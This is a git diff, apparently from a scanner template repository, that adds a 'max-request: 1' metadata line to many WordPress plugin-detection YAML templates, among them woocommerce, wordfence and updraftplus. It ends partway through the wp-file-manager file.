diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/pretty-link/
 metadata:
+ max-request: 1
 plugin_namespace: pretty-link
 wpscan: https://wpscan.com/plugin/pretty-link
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/really-simple-captcha/
 metadata:
+ max-request: 1
 plugin_namespace: really-simple-captcha
 wpscan: https://wpscan.com/plugin/really-simple-captcha
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/really-simple-ssl/
 metadata:
+ max-request: 1
 plugin_namespace: really-simple-ssl
 wpscan: https://wpscan.com/plugin/really-simple-ssl
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/redirection/
 metadata:
+ max-request: 1
 plugin_namespace: redirection
 wpscan: https://wpscan.com/plugin/redirection
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/redux-framework/
 metadata:
+ max-request: 1
 plugin_namespace: redux-framework
 wpscan: https://wpscan.com/plugin/redux-framework
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/regenerate-thumbnails/
 metadata:
+ max-request: 1
 plugin_namespace: regenerate-thumbnails
 wpscan: https://wpscan.com/plugin/regenerate-thumbnails
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/safe-svg/
 metadata:
+ max-request: 1
 plugin_namespace: safe-svg
 wpscan: https://wpscan.com/plugin/safe-svg
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/seo-by-rank-math/
 metadata:
+ max-request: 1
 plugin_namespace: seo-by-rank-math
 wpscan: https://wpscan.com/plugin/seo-by-rank-math
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/sg-cachepress/
 metadata:
+ max-request: 1
 plugin_namespace: sg-cachepress
 wpscan: https://wpscan.com/plugin/sg-cachepress
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/sg-security/
 metadata:
+ max-request: 1
 plugin_namespace: sg-security
 wpscan: https://wpscan.com/plugin/sg-security
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index deee1b309f..4061421104 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/shortcodes-ultimate/
 metadata:
+ max-request: 1
 plugin_namespace: shortcodes-ultimate
 wpscan: https://wpscan.com/plugin/shortcodes-ultimate
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/shortpixel-image-optimiser/
 metadata:
+ max-request: 1
 plugin_namespace: shortpixel-image-optimiser
 wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/simple-custom-post-order/
 metadata:
+ max-request: 1
 plugin_namespace: simple-custom-post-order
 wpscan: https://wpscan.com/plugin/simple-custom-post-order
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/siteguard/
 metadata:
+ max-request: 1
 plugin_namespace: siteguard
 wpscan: https://wpscan.com/plugin/siteguard
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/siteorigin-panels/
 metadata:
+ max-request: 1
 plugin_namespace: siteorigin-panels
 wpscan: https://wpscan.com/plugin/siteorigin-panels
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/smart-slider-3/
 metadata:
+ max-request: 1
 plugin_namespace: smart-slider-3
 wpscan: https://wpscan.com/plugin/smart-slider-3
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/so-widgets-bundle/
 metadata:
+ max-request: 1
 plugin_namespace: so-widgets-bundle
 wpscan: https://wpscan.com/plugin/so-widgets-bundle
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
 metadata:
+ max-request: 1
 plugin_namespace: stops-core-theme-and-plugin-updates
 wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/sucuri-scanner/
 metadata:
+ max-request: 1
 plugin_namespace: sucuri-scanner
 wpscan: https://wpscan.com/plugin/sucuri-scanner
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/svg-support/
 metadata:
+ max-request: 1
 plugin_namespace: svg-support
 wpscan: https://wpscan.com/plugin/svg-support
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/table-of-contents-plus/
 metadata:
+ max-request: 1
 plugin_namespace: table-of-contents-plus
 wpscan: https://wpscan.com/plugin/table-of-contents-plus
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/tablepress/
 metadata:
+ max-request: 1
 plugin_namespace: tablepress
 wpscan: https://wpscan.com/plugin/tablepress
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/taxonomy-terms-order/
 metadata:
+ max-request: 1
 plugin_namespace: taxonomy-terms-order
 wpscan: https://wpscan.com/plugin/taxonomy-terms-order
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/the-events-calendar/
 metadata:
+ max-request: 1
 plugin_namespace: the-events-calendar
 wpscan: https://wpscan.com/plugin/the-events-calendar
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/themeisle-companion/
 metadata:
+ max-request: 1
 plugin_namespace: themeisle-companion
 wpscan: https://wpscan.com/plugin/themeisle-companion
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/tinymce-advanced/
 metadata:
+ max-request: 1
 plugin_namespace: tinymce-advanced
 wpscan: https://wpscan.com/plugin/tinymce-advanced
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/translatepress-multilingual/
 metadata:
+ max-request: 1
 plugin_namespace: translatepress-multilingual
 wpscan: https://wpscan.com/plugin/translatepress-multilingual
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
 metadata:
+ max-request: 1
 plugin_namespace: ultimate-addons-for-gutenberg
 wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index b7ad16e281..48481fde3b 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/under-construction-page/
 metadata:
+ max-request: 1
 plugin_namespace: under-construction-page
 wpscan: https://wpscan.com/plugin/under-construction-page
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 10fd071b0b..b34d196268 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/updraftplus/
 metadata:
+ max-request: 1
 plugin_namespace: updraftplus
 wpscan: https://wpscan.com/plugin/updraftplus
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/use-any-font/
 metadata:
+ max-request: 1
 plugin_namespace: use-any-font
 wpscan: https://wpscan.com/plugin/use-any-font
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/user-role-editor/
 metadata:
+ max-request: 1
 plugin_namespace: user-role-editor
 wpscan: https://wpscan.com/plugin/user-role-editor
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/velvet-blues-update-urls/
 metadata:
+ max-request: 1
 plugin_namespace: velvet-blues-update-urls
 wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/w3-total-cache/
 metadata:
+ max-request: 1
 plugin_namespace: w3-total-cache
 wpscan: https://wpscan.com/plugin/w3-total-cache
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/webp-converter-for-media/
 metadata:
+ max-request: 1
 plugin_namespace: webp-converter-for-media
 wpscan: https://wpscan.com/plugin/webp-converter-for-media
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/webp-express/
 metadata:
+ max-request: 1
 plugin_namespace: webp-express
 wpscan: https://wpscan.com/plugin/webp-express
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/widget-importer-exporter/
 metadata:
+ max-request: 1
 plugin_namespace: widget-importer-exporter
 wpscan: https://wpscan.com/plugin/widget-importer-exporter
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
 metadata:
+ max-request: 1
 plugin_namespace: woo-cart-abandonment-recovery
 wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
 metadata:
+ max-request: 1
 plugin_namespace: woo-checkout-field-editor-pro
 wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woo-variation-swatches/
 metadata:
+ max-request: 1
 plugin_namespace: woo-variation-swatches
 wpscan: https://wpscan.com/plugin/woo-variation-swatches
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-gateway-paypal-express-checkout
 wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-gateway-stripe/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-gateway-stripe
 wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-payments/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-payments
 wpscan: https://wpscan.com/plugin/woocommerce-payments
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-paypal-payments/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-paypal-payments
 wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-pdf-invoices-packing-slips
 wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce-services/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce-services
 wpscan: https://wpscan.com/plugin/woocommerce-services
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/woocommerce/
 metadata:
+ max-request: 1
 plugin_namespace: woocommerce
 wpscan: https://wpscan.com/plugin/woocommerce
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wordfence/
 metadata:
+ max-request: 1
 plugin_namespace: wordfence
 wpscan: https://wpscan.com/plugin/wordfence
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wordpress-importer/
 metadata:
+ max-request: 1
 plugin_namespace: wordpress-importer
 wpscan: https://wpscan.com/plugin/wordpress-importer
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wordpress-seo/
 metadata:
+ max-request: 1
 plugin_namespace: wordpress-seo
 wpscan: https://wpscan.com/plugin/wordpress-seo
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/worker/
 metadata:
+ max-request: 1
 plugin_namespace: worker
 wpscan: https://wpscan.com/plugin/worker
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/wp-fastest-cache/
 metadata:
+ max-request: 1
 plugin_namespace: wp-fastest-cache
 wpscan: https://wpscan.com/plugin/wp-fastest-cache
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
